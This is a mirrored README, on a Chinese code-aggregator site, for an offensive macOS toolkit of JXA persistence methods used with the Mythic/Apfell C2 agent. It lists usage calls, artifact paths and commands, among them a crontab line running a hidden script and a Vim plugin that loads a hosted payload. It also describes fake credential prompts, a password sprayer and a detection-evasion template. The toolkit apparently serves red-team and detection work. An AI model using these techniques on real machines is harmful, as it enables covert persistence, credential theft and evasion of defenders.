• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

D00MFist/PersistentJXA: Collection of macOS persistence methods and miscellaneou ...

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

D00MFist/PersistentJXA

开源软件地址(OpenSource Url):

https://github.com/D00MFist/PersistentJXA

开源编程语言(OpenSource Language):

JavaScript 97.0%

开源软件介绍(OpenSource Introduction):

PersistentJXA

Collection of macOS persistence methods and miscellaneous tools in JXA
Related blog posts:

Usage

  • In Mythic (Apfell Agent) :
jsimport (Selected file)
jsimport_call <NameOfPersistenceScript>(ScriptArguments)
Project Description Usage Artifacts Created Commandline Commands Executed
AtomPersist Persistence using the Atom init script. Appends the Atom init script to execute our command.
Persistence executes upon Atom opening.
jsimport_call AtomPersist('osascript -l JavaScript -e ...') Modification to end of:
/System/Volumes/Data/Users/{User}/.atom/init.coffee
N/A
BashProfilePersist Modifies user's bash profile to execute script if the persistence process (current implementation assumes osascript) is not already running. If Catalina system then .zshenv is modified.
Persistence executes on terminal open.
jsimport_call BashProfilePersist('osascript -l JavaScript -e ...', 'no') $HOME/.bash_profile or $HOME/.zshenv

If select "yes" for hidden file creation then:
$HOME/.security/apple.sh
$HOME/.security/update.sh
N/A by default.
"no" for hidden file creation option

If select "yes" for hidden file creation then:
sh $HOME/.security/apple.sh

sh $HOME/.security/persist.sh
CalendarPersist Persistence via macOS Calendar.app alerts. This script will create new events and inserts them into the calendar with an alert that executes an application. There is additional funcitionality to modify exsiting events, list calendars, list events, and hide calendars.
Persistence executes upon the event alert which triggers the specified persistence application. See https://github.com/FSecureLABS/CalendarPersist for usage details and background
jsimport_call persist_calalert("Fake Meeting", "/Users/Shared/Persist.app", 60, "daily", 1, 3, "FB825EFC-C65F-4959-8BDC-EBDF9E886C45")) /Users/{USER}/Calendars/Calendar Cache If hide_calendar function used:
sh -c defaults write com.apple.iCal DisabledCalendars -dict MainWindow '({uid})'
CronJobPersistence Persistence using CronJobs. This script will create a hidden file (share.sh) in the current user's Public/Drop Box folder. Writes a cron job with a default interval of 15mins which executes the hidden script.
(Note: This command generates a user prompt for Catalina. If the user clicks “Don’t Allow” the command should fail with an “operation not permitted").
Persistence executes every 15 mins.
jsimport_call CronJobPersistence('#!/bin/zsh \n osascript -l JavaScript -e ...') $HOME/Public/Drop\ Box/.share.sh
crontab entry
sh -c echo "$(echo '15 * * * * cd $HOME/Public/Drop\ Box/ && ./.share.sh' ; crontab -l)" | crontab -

sh -c (Persistence Action)
DockPersist Modifies the apple dock plist for persistence. Requires an application to be present on target. Persistence executes upon user interaction. jsimport_call DockPersist("Safari", "com.apple.automator.Safari","yes")
or
jsimport_call DockPersist("Google Chrome", "com.apple.automator.Google-Chrome","yes")
$HOME/Library/Preferences/com.apple.dock.plist If ReloadNow function used:
/usr/bin/killall Dock
FinderSyncPlugins Persistence using Finder Sync Extensions. Requires and app on the target to be setup for abuse. It searches the app for the required files and registers them.
See https://objective-see.com/blog/blog_0x11.html for how to setup.
Persistence executes on login.
jsimport_call FinderSyncPlugins('/Users/Shared/SyncTest.app') N/A pluginkit -a </some/path/persist.appex> &

pluginkit -e use -i &
iTermAppScript Persistence using the iTerm2 application startup script. Appends the application script for iTerm2 to execute our command. If the folder does not exist then one will be created.
Persistence executes upon iTerm2 opening.
See https://theevilbit.github.io/beyond/beyond_0002/ for more details.
jsimport_call iTermAppScript('osascript -l JavaScript -e ...') modification to end of /Library/Application\ Support/iTerm2/Scripts/AutoLaunch/iTerm.py sh -c (Persistence Action)
LoginScript Requires Root Modifies login window plist for persistence. Persistence executes on login. jsimport_call LoginScript('#!/bin/zsh \n osascript -l JavaScript -e ...') /var/root/Library/Preferences/com.apple.loginwindow.plist

/Users/Shared/.security/test.sh
sh -c (Persistence Action)
PeriodicPersist Requires Root Create a daily job in /etc/periodic/daily. Persistence executes daily. jsimport_call PeriodicPersist('osascript -l JavaScript -e ...') /etc/periodic/daily/111.clean-hist sh -c (Persistence Action)
ScreenSaverPersist Modifies the screensaver plist for persistence. Requires a .saver at ~/Library/Screen Savers/ to be present on target. Persistence executes upon screensaver triggering. Current implementation sets screensaver at 1 minute.

Note: Processes started from the screensaver are sandboxed
See https://theevilbit.github.io/beyond/beyond_0016/ for details on the entitlements.
jsimport_call ScreenSaverPersist("Blank")
$HOME/Library/Preferences/ByHost/com.apple.screensaver.[Hardware-UUID].plist /usr/bin/killall -hup cfprefsd
SSHrc Modifies or creates SSH rc file to execute persistence when the user logs in with SSH and if the persistence process (current implementation assumes osascript) is not already running.
See https://twitter.com/0xdade/status/1373145566943711235?s=20 for more details.
jsimport_call SSHrc('itsatrap','osascript -l JavaScript -e ...', 'no') /Users/'userName'/.ssh/rc

If select "yes" for hidden file creation then:
/Users/'userName'/.security/apple.sh
/Users/'userName'/.security/update.sh
N/A by default.
"no" for hidden file creation option

If select "yes" for hidden file creation then:
sh /Users/'userName'/.security/apple.sh

sh /Users/'userName'/.security/persist.sh
SublimeTextAppScriptPersistence Persistence using the Sublime Text application script. Appends the application script for Sublime to execute our command..
Persistence executes upon Sublime opening.
See https://theevilbit.github.io/posts/macos_persisting_through-application_script_files/ for more details.
jsimport_call SublimeTextAppScriptPersistence('osascript -l JavaScript -e ...') modification to end of /Applications/Sublime\ Text.app/Contents/MacOS/sublime.py sh -c (Persistence Action)
SublimeTextPluginPersistence Persistence using Sublime Text plugins. Creates a plugin file that is executed upon the opening of Sublime.
Persistence executes upon Sublime opening.
jsimport_call SublimeTextPluginPersistence('/Users/Shared/inject.dylib') $HOME/Library/Application\ Support/Sublime\ Text\ [2 or 3] /PrettyText/PrettyText.py N/A
TermPref Modifies the terminal plist. Current implementation shows an indictator to the end user of the command run upon each new terminal. Persistence executes upon new terminal window.

See https://theevilbit.github.io/beyond/beyond_0020/ for details.
jsimport_call TermPref('osascript -l JavaScript -e ...')
$HOME/Library/Preferences/com.apple.Terminal.plist /usr/bin/killall -hup Terminal
VimPluginPersistence Persistence using Vim plugins. Creates a plugin file that is executed upon the opening of vim.
Persistence executes upon vim opening.
jsimport_call VimPluginPersistence('http://path/to/hosted/apfellpayload') $HOME/.vim/plugin/d.vim sh -c (Persistence Action)
xbarPlugin Persistence using xbar plugins. Creates a plugin file that is executed upon the opening of xbar.
Persistence executes upon xbar opening. Concept from @bradleyjkemp
jsimport_call xbarPlugin('osascript -l JavaScript -e ...') $HOME/Library/Application\ Support/xbar/plugins/xbarUtil.py sh -c (Persistence Action)

Misc Scripts / Tools

Project Description Usage Artifacts Created Commandline Commands
DylibHijackScan JXA version of Patrick Wardle's tool that searches applications for dylib hijacking opportunities. May generate user pop up if looking into protected fodlers. Requires xcode installed on 10.14.1 jsimport_call DylibHijackScan() N/A "sh -c lsof | tr -s ' ' | cut -d' ' -f9 | sed '/^$/d' | grep '^/'| sort | uniq"
sh -c file "placeholder"
sh -c otool -l "placeholder"
InjectCheck Process Injection Checker. The tool enumerates the Hardened Runtime, Entitlements, and presence of Electron files to determine possible injection opportunities jsimport_call InjectCheck("All")
or
jsimport_call InjectCheck("/Applications/Firefox.app")
N/A N/A
JamfInfo Jamf Plist Inspector. List of Jamf configuration details and Azure information (if applicable). Inspects the plist located at /Library/Preferences/com.jamfsoftware.jamf.plist jsimport_call JamfInfo() N/A N/A
PasswordSpray Local Account Password Sprayer. The tool leverages the Open Directory Framework to test passwords which is not subject to account lockout jsimport_call PasswordSpray("itsatrap","Password1,Password2,Password3") N/A N/A
PrivilegedHelperToolSpoof Tools searches the installed Privileged Helper Tools "/Library/PrivilegedHelperTools" and leverages legitimate icons and information in an attempt to gain user password credentials. The tool prompts again (with slightly different text) if the first password entry is blank. If no helper tool then default prompt for creds. jsimport_call PrivHelpToolSpoof() N/A sh -c launchctl plist __TEXT,__info_plist /Library/PrivilegedHelperTools/ | grep -A1 AuthorizedClients"
OutlookUpdatePrompt Tool which prompts the user for and update in an attempt to gain password credentials. Attempts to bring a prompt using outlook icon if installed otherwise uses standard cog. Returns credentials from prompt entry to the user. jsimport_call OutlookUpdatePrompt() N/A N/A
WorkflowTemplate A template for Automator to execute JXA. This is to evade simple detections on commandline osascript. After replacing the placeholder (JXA PAYLOAD HERE) with the desired js script, it can be executed by /usr/bin/automator /path/to/file/Workflow.wflow. Requires the file to be on host but can be leveraged in combination with the above persistence methods /usr/bin/automator /path/to/file/Workflow.wflow /path/to/file/Workflow.wflow /usr/bin/automator /path/to/file/Workflow.wflow



鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap